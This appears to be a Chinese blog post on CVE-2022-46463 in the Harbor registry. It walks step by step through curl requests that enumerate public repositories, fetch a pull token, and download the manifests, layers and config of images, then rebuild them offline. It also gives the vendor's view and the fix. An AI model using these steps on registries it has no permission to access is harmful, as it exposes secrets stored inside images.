CVE-2022-46463 Harbor public 镜像仓库信息泄露

CVSS评分:7.5

CVE-2022-46463 Harbor public 镜像仓库信息泄露

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

Harbor 是一个企业级的 Docker Registry 服务,用于存储和管理 Docker 镜像。当 Harbor 实例被设置为公开(public)时,可能导致敏感信息泄露的风险。攻击者可以通过公开的 Harbor 实例访问到存储在其中的镜像信息,包括可能包含敏感数据、配置文件、私钥等的镜像内容。这种信息泄露可能导致数据泄露、安全漏洞暴露等问题,严重影响系统和数据的安全性。

通过 CVE-2022-46463,读取公开镜像信息并拉取,例子(v2版本):

++1、首先读取公开镜像列表++

读取全部镜像,就是传入一个 / ,但是企业内部的镜像有很多,读取全部镜像可能耗时会很长

bash 复制代码
http://xxx/api/v2.0/search?q=your-search

++2、获取仓库的 Pull Token++

bash 复制代码
http://xxx/service/token?scope=repository%3A这里填你的image镜像名称%3Apull&service=harbor-registry

会返回一个 token 的值:

后续所有的请求,都要带上:

bash 复制代码
Authorization: Bearer $TOKEN

++3、查询 tag 的 digest(即 manifest digest)(这个不用带Authorization)++

bash 复制代码
http://xxx/api/v2.0/projects/镜像名称前半部分/repositories/镜像名称后半部分/artifacts?with_tag=true

我们需要:

  • digest 的值

++4、根据 manifest digest 获取镜像 manifest++

bash 复制代码
curl -sk \
  -H "Authorization: Bearer $TOKEN" \
"https://xxx/v2/你镜像的名字/manifests/第三步得到的digest值"

此处需要所有 layer 的 digest,这些是镜像的真正数据层:

bash 复制代码
sha256:layer1...
sha256:layer2...
...

++5、逐层下载镜像 Layer Blob(镜像内容主体)++

bash 复制代码
curl -sk \
  -H "Authorization: Bearer $TOKEN" \
  -o layer1.tar.gz \
"https://xxx/v2/镜像名称/blobs/上一步得到的 layer 的 digest"

重复此操作下载所有层,得到文件:

bash 复制代码
layer1.tar.gz
layer2.tar.gz
...

++6、下载 config(镜像配置)++

manifest 通常还包含 config digest:

plain 复制代码
"config": {
   "digest": "sha256:cf1234..."
}

同上一步骤,下载 config,到这一步,我们就拿到了完整镜像内容(等价于 docker pull 后 docker save 导出的结构)。

++7、本地还原镜像(离线加载)++

如果你想把这些 API 拉下来的文件还原成一个 docker 镜像,把目录结构做成:

plain 复制代码
manifest.json
config.json
<digest>/layer.tar
<digest>/layer.tar

然后:

bash 复制代码
tar -cvf image.tar manifest.json config.json */layer.tar
docker load -i image.tar

即可完全离线还原镜像

2. 漏洞危害

官方回应明确指出,他们不认为公开的 CVE-2022-46463 是Harbor的一个漏洞,而是Harbor官方文档中所明确定义的特性之一,即用户可以设置一些镜像为公开,该特性导致Harbor上的所有被设置为公开的项目都通过相应的API接口被列举,获取详细信息,甚至被拉取。

测试过程中,如果用户不对项目访问级别勾选"公开"项,则只有项目设置所属账户和admin账户可以看到此类项目,因而所有未认证的用户均无法通过API或前端查询到任何信息。

但由于Harbor的前端界面需要登录认证,针对使用Harbor不熟悉的用户在操作时仍有可能会误用该功能,从而使包含敏感信息的镜像仓库对所有人开放,而用户的初衷可能只是对认证用户开放。

3. 漏洞修复

不对项目访问级别勾选"公开"项

相关推荐
zhengfei61133 分钟前
渗透工具集——15款常见C2的框架
测试工具·安全
星哥说事1 小时前
系统安全加固:禁用不必要服务和端口,及时更新安全补丁
安全·系统安全
unable code2 小时前
攻防世界-Misc-4-1
网络安全·ctf·misc·1024程序员节
金灰3 小时前
写在创作第 730 天:一些关于学习、技术与自我认知的记录
学习·安全
Dingdangr4 小时前
基于Python的火焰识别系统设计与实现(含论文、开题报告及答辩PPT)
java·python·测试工具·安全
金灰5 小时前
一带一路(金砖)--网络安全防护治理赛项
网络·计算机网络·安全·web安全·网络安全·网络攻击模型·安全威胁分析
Bruce_Liuxiaowei5 小时前
网站敏感文件_目录大全(分类记忆+风险标注)
运维·网络·网络协议·http·网络安全·https
脆皮瞎5 小时前
内网域渗透-信息收集
网络·网络安全
独角鲸网络安全实验室5 小时前
高危预警!React核心组件曝CVSS 9.8漏洞,数百万开发者面临远程代码执行风险
运维·前端·react.js·网络安全·企业安全·漏洞·cve-2025-11953
独角鲸网络安全实验室5 小时前
高危预警!React CVE-2025-55182 突破 RSC 防护,未授权 RCE 威胁 39% 云应用
前端·react.js·网络安全·前端框架·漏洞·rce·cve-2025-55182